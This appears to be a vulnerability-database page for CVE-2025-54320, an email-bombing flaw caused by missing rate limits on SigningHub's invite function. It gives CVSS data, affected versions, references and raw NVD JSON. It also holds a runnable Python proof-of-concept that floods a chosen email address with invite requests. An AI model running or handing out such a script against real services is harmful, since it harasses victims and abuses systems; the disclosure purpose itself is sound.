Security Vulnerability Report
CVE-2025-54320 CVSS 4.3 MEDIUM

Published: 2025-11-18 19:15:49
Last Modified: 2025-11-20 19:02:04

Description

In Ascertia SigningHub through 8.6.8, there is a lack of rate limiting on the invite user function, leading to an email bombing vulnerability. An authenticated attacker can exploit this by automating invite requests.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:ascertia:signinghub:*:*:*:*:*:*:*:* - VULNERABLE
Ascertia SigningHub through 8.6.8 (versionEndIncluding 8.6.8)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54320 PoC - Email Bombing via Invite User Function
# Target: Ascertia SigningHub through 8.6.8
# Vulnerability: Lack of rate limiting on invite user function
import requests
import time
import argparse


def exploit_cve_2025_54320(target_url, auth_token, target_email, count=100):
    """
    CVE-2025-54320 Exploit - Email bombing via invite user API

    Args:
        target_url: Base URL of SigningHub instance
        auth_token: Authentication token (low-privilege user)
        target_email: Target email address to flood
        count: Number of invite requests to send
    """
    session = requests.Session()
    headers = {
        'Authorization': f'Bearer {auth_token}',
        'Content-Type': 'application/json'
    }

    # Invite user API endpoint
    invite_endpoint = f"{target_url}/api/v1/users/invite"

    payload = {
        'email': target_email,
        'role': 'user',
        'send_invite': True
    }

    print(f"[*] Starting email bombing attack on {target_email}")
    print(f"[*] Target: {target_url}")
    print(f"[*] Sending {count} invite requests...")

    for i in range(count):
        try:
            response = session.post(invite_endpoint, json=payload, headers=headers)
            if response.status_code == 200:
                print(f"[+] Request {i+1}/{count} sent successfully")
            else:
                print(f"[-] Request {i+1}/{count} failed: {response.status_code}")
        except Exception as e:
            print(f"[-] Error: {e}")

        # Small delay to avoid immediate connection issues
        time.sleep(0.1)

    print(f"[*] Attack completed. Sent {count} invite requests.")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-54320 PoC')
    parser.add_argument('--url', required=True, help='Target SigningHub URL')
    parser.add_argument('--token', required=True, help='Authentication token')
    parser.add_argument('--email', required=True, help='Target email address')
    parser.add_argument('--count', type=int, default=100, help='Number of requests')
    args = parser.parse_args()
    exploit_cve_2025_54320(args.url, args.token, args.email, args.count)

References

https://github.com/saykino/CVE-2025-54320 (Third Party Advisory)
https://www.ascertia.com/company/vulnerability-disclosure-policy/ (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-54320",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-18T19:15:48.880",
    "lastModified": "2025-11-20T19:02:03.580",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In Ascertia SigningHub through 8.6.8, there is a lack of rate limiting on the invite user function, leading to an email bombing vulnerability. An authenticated attacker can exploit this by automating invite requests."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-770"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ascertia:signinghub:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "8.6.8",
                "matchCriteriaId": "04320C9C-96AC-4A4A-8EEA-27C59A9EDBE7"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/saykino/CVE-2025-54320",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://www.ascertia.com/company/vulnerability-disclosure-policy/",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}